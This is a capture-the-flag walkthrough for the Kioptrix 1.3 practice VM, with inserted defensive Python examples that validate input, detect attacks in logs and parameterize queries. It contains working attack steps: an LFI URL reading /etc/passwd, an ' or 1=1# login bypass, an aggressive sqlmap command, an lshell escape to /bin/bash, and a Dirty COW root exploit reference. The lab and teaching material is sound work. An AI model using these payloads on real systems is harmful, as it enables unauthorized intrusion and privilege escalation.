Kioptrix: Level 1.3 (#4) Walkthrough Summary (Vulnhub | OSCP Model)
Step-by-step process:
Target Machine VM's IP:
Step 1: I start by finding the IP address of the target Kioptrix 1.3 (#4) machine, using the command below.
netdiscover -r 192.168.48.0/24
Compare with the VMware MAC address for confirmation.
Enumeration:
Step 2: Nmap scan to find out which services are running
nmap -Pn -A -v 192.168.48.163
Step 3: Try to find directories and interesting files with the commands below.
dirb http://192.168.48.163
nikto -h http://192.168.48.163
Step 4: Enumerate any other service you found in the Nmap result. Here I found an SMB service.
enum4linux 192.168.48.163
Gaining Access (Exploitation):
Local File Inclusion (LFI)
URL + payload: http://192.168.48.163/member.php?username=/etc/etc/passwd%00
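The request above works because member.php hands the username parameter to a file operation, and the trailing %00 cuts off whatever suffix the script appends. As an added example (not code from the walkthrough or from the Kioptrix VM), here is the defender's side in Python: an allowlist check that rejects such a value before it reaches the filesystem, plus a small access-log scan that flags requests carrying the same patterns. The directory /var/www/members, the .txt suffix and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

# Assumed directory of per-member files; not a path from the Kioptrix VM.
BASE_DIR = os.path.realpath("/var/www/members")
# Allowlist: a username is a short run of word characters, nothing else.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

def resolve_member_file(username_param):
    """Map the raw (URL-encoded) username parameter to a file path, or return
    None if the value could select anything other than a member file."""
    name = unquote(username_param)
    if "\x00" in name:                 # %00 truncation: reject outright
        return None
    if not NAME_RE.fullmatch(name):    # no '/', '.', spaces or other path syntax
        return None
    path = os.path.realpath(os.path.join(BASE_DIR, name + ".txt"))
    # Defence in depth: the resolved path must still sit under BASE_DIR.
    if os.path.commonpath([path, BASE_DIR]) != BASE_DIR:
        return None
    return path

# Detection: request targets in access-log lines that carry the traces an
# LFI probe leaves behind (null byte, traversal, /etc/ paths).
SUSPICIOUS = re.compile(r"%00|\.\./|/etc/", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')

def flag_lfi_requests(log_lines):
    """Return the request paths from Apache-style log lines that look like LFI probes."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and SUSPICIOUS.search(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed Apache-style lines for the demo, not logs from the VM.
SAMPLE_LOG = [
    '192.168.48.10 - - [01/Jan/2020:10:00:00 +0000] "GET /member.php?username=john HTTP/1.1" 200 512',
    '192.168.48.10 - - [01/Jan/2020:10:00:05 +0000] "GET /member.php?username=/etc/etc/passwd%00 HTTP/1.1" 200 1843',
    '192.168.48.10 - - [01/Jan/2020:10:00:09 +0000] "GET /member.php?username=../../etc/passwd HTTP/1.1" 200 1843',
]

if __name__ == "__main__":
    for value in ("john", "/etc/etc/passwd%00", "../../etc/passwd"):
        print(f"{value!r:24s} -> {resolve_member_file(value)}")
    print("flagged:", flag_lfi_requests(SAMPLE_LOG))
```

The allowlist does the real work; the realpath check only guards against a future change that loosens the regex. Run the script as-is and both the page's payload and a plain traversal come back as None, while the log scan flags the two probe lines and leaves the legitimate request alone.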
SQL Injection:
XPath injection at the password field
Payload: 'or 1=1#
Sqlmap:
sqlmap -u http://192.168.48.163/checklogin.php --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --level=5 --risk=3 --dbs
to find more users.
Log in with the SSH service.
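Why the login form falls to 'or 1=1# and what the fix looks like, as an added example that is not code from the walkthrough or from the Kioptrix VM. The table, the user rows and the in-memory SQLite database are constructed; because SQLite has no # line comment, the demo uses the equivalent -- form, which is an assumption about how the page's MySQL-style payload maps onto it.

```python
import sqlite3

# Constructed in-memory table standing in for the login table behind
# checklogin.php; names and rows are assumptions, not data from the VM.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    # Plaintext passwords only so the injectable query stays comparable;
    # a real application stores a salted hash and compares in code.
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [("john", "S3cr3t!"), ("robert", "Pa55w0rd")])
    return conn

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation, so the password
    field's content becomes part of the SQL statement."""
    query = ("SELECT username FROM members WHERE username='" + username
             + "' AND password='" + password + "'")
    return sorted(r[0] for r in conn.execute(query).fetchall())

def login_parameterized(conn, username, password):
    """Same check with bound parameters: the driver sends the values
    separately, so quotes and comment markers in them are just data."""
    query = "SELECT username FROM members WHERE username=? AND password=?"
    rows = conn.execute(query, (username, password)).fetchall()
    return sorted(r[0] for r in rows)

# The page's payload ends in MySQL's '#' line comment; SQLite, used here so
# the example runs offline, only knows '--', hence this equivalent form.
PAYLOAD = "' or 1=1-- "

def demo():
    conn = build_db()
    return {
        "vulnerable": login_vulnerable(conn, "john", PAYLOAD),
        "parameterized": login_parameterized(conn, "john", PAYLOAD),
        "legitimate": login_parameterized(conn, "john", "S3cr3t!"),
    }

if __name__ == "__main__":
    for name, users in demo().items():
        print(f"{name:13s} -> {users}")
```

In the concatenated version the statement becomes `... AND password='' or 1=1-- '`, so the condition is true for every row and the form "authenticates" as the first user returned. The parameterized version returns nothing for the same input and still matches the real password, which is the whole fix: the query shape is fixed at compile time and user input can only ever be a value.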
Privilege Escalation:
After enumeration and research, I tried a lot of ways.
Here I found one way; of course there are many ways, but I feel this is the easiest one.
The restricted shell is implemented in Python, as per my research.
Bypassing lshell with os.system
Payload: echo os.system('/bin/bash')
Ref: https://www.aldeid.com/wiki/Lshell
export TERM=xterm
The public exploit is Dirty COW:
https://www.exploit-db.com/exploits/40839/
Bingo :-) Got a root shell.
Clean up:
Just reset the victim machine for cleanup.
